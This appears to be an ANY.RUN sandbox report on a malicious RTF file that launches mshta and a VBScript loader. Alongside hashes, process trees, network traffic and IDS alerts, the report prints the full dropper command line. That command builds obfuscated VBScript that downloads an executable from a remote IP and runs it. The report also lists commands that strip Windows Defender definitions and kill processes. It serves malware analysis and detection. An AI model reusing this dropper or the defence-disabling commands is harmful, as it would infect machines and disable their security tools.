File name:

copy22-01-2019.doc

Full analysis: https://app.any.run/tasks/97b2bbab-1a22-462e-820a-afd8d217b9d2
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 23, 2019, 09:13:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

40B22805F60851CE74E24FFEF75A5F86

SHA1:

133DDF5204D3D16866E51796AC1F4EF33EAA2DBA

SHA256:

95877BE35415F7872AE5E3A561ABBDCC4FEC32A49E95B5345CCF314415BA7B82

SSDEEP:

6144:kX0OPX0OVX0OiX0OXX0O0X0OrX0OxX0Oz:kv1C3ULRT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 404)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 404)

    • Changes settings of System certificates

      • mshta.exe (PID: 2716)

    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2716)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3140)

    • Uses TASKKILL.EXE to kill antiviruses

      • cmd.exe (PID: 3912)

    • Downloads executable files from IP

      • WScript.exe (PID: 3728)

    • Downloads executable files from the Internet

      • WScript.exe (PID: 3728)

    • Application was dropped or rewritten from another process

      • AVASTINT.EXE (PID: 2736)
      • AVASTINT.EXE (PID: 2960)

  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2716)

    • Creates files in the user directory

      • mshta.exe (PID: 2716)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2716)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3912)

    • Executes scripts

      • cmd.exe (PID: 2448)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3912)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3728)

    • Application launched itself

      • AVASTINT.EXE (PID: 2736)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 404)
      • WINWORD.EXE (PID: 2988)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2988)

    • Reads internet explorer settings

      • mshta.exe (PID: 2716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
18
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs mpcmdrun.exe no specs taskkill.exe no specs wscript.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs timeout.exe no specs avastint.exe no specs avastint.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
404"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2376taskkill /f /im mshta.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
2444taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
2448"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://216.170.120.102/kates.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXEC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2716mshta.exe https://methodsofcreation.blogspot.com/p/encryption2.htmlC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
2736AVASTINT.EXEC:\Users\Public\AVASTINT.EXEcmd.exe
User:
admin
Company:
Conditionate
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.02.0008
Modules
Images
c:\users\public\avastint.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
2836taskkill /f /im POWERPNT.EXE C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
2848MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2908timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2960VASTINT.EXEC:\Users\Public\AVASTINT.EXEAVASTINT.EXE
User:
admin
Company:
Conditionate
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.02.0008
Modules
Images
c:\users\public\avastint.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
Total events
720
Read events
584
Write events
131
Delete events
5

Modification events

(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:v9,
Value:
76392C00AC0B0000010000000000000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1312227351
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227472
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227473
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
AC0B0000CE5AFDE5FBB2D40100000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:?;,
Value:
3F3B2C00AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:?;,
Value:
3F3B2C00AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
5
Text files
47
Unknown types
5

Dropped files

PID
Process
Filename
Type
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE9F6.tmp.cvr
MD5:
SHA256:
404EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRF215.tmp.cvr
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$py22-01-2019.docpgc
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C3DBEEA.wmfwmf
MD5:
SHA256:
2716mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\error[1]
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE0DEDE3.wmfwmf
MD5:
SHA256:
2716mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\warning[1]
MD5:
SHA256:
2716mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\encryption2[1].htmlhtml
MD5:
SHA256:
2716mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[2]
MD5:
SHA256:
2716mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\warning[1]
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
13
DNS requests
7
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3728
WScript.exe
GET
200
216.170.120.102:80
http://216.170.120.102/kates.exe
US
executable
1.17 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2716
mshta.exe
172.217.22.65:443
methodsofcreation.blogspot.com
Google Inc.
US
whitelisted
2716
mshta.exe
172.217.16.201:443
www.blogger.com
Google Inc.
US
whitelisted
2716
mshta.exe
172.217.18.174:443
apis.google.com
Google Inc.
US
whitelisted
2716
mshta.exe
216.58.205.226:443
pagead2.googlesyndication.com
Google Inc.
US
whitelisted
2716
mshta.exe
216.58.205.237:443
accounts.google.com
Google Inc.
US
whitelisted
3728
WScript.exe
216.170.120.102:80
ColoCrossing
US
suspicious

DNS requests

Domain
IP
Reputation
methodsofcreation.blogspot.com
  • 172.217.22.65
whitelisted
www.blogger.com
  • 172.217.16.201
shared
apis.google.com
  • 172.217.18.174
whitelisted
pagead2.googlesyndication.com
  • 216.58.205.226
whitelisted
resources.blogblog.com
  • 172.217.16.201
whitelisted
accounts.google.com
  • 216.58.205.237
shared
img1.blogblog.com
  • 172.217.16.201
suspicious

Threats

PID
Process
Class
Message
3728
WScript.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3728
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3728
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3728
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3728
WScript.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
copy22-01-2019.doc